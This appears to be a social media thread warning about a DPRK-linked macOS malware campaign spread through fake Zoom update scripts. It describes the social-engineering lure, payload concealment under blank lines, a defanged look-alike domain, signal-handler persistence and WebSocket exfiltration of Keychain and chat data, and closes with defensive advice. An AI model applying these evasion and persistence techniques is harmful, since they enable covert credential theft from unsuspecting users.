The attacker pretends to be a trusted contact → DM on Telegram → Calendly invite → follow-up email with a Zoom link that tells victims to “run this update script.”

It's been hyper successful and catching founders/devs off-guard

That script (`zoom_sdk_support.scpt`) hides *10,000 blank lines* scroll forever, never see the payload.

The last 3 lines fetch stage-2 from `support.us05web-zoom[.]forum` (notice the look-alike Zoom domain)

Stage-2 drops two binaries in /private/var/tmp

• `a` (C++) - kicks off data-stealing chain
• `installer` (Nim) - sets up persistence via signal handlers so killing the process re-installs the backdoor on reboot.

Nasty little persistence trick - malware revives itself when killed.
It intercepts `SIGINT` / `SIGTERM`, then rewrites LaunchAgents on shutdown.

"any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions."

The data exfiltration:

Keychain creds, browser data, Telegram chats, then push over WebSockets - encrypted channel, tricky for network sensors that ignore non-HTTP(S) traffic

macOS isn’t safe just because of Gatekeeper

social-engineering + obscure languages (Nim) = new blind spots.

Patch, monitor WebSocket egress, & warn employees: *no legit Zoom update arrives as an AppleScript!*

RT to keep teams safe.

[1]: https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/ "macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware | SentinelOne"

[2]: https://www.securityweek.com/north-korean-hackers-use-fake-zoom-updates-to-install-macos-malware/ "North Korean Hackers Use Fake Zoom Updates to Install macOS Malware - SecurityWeek"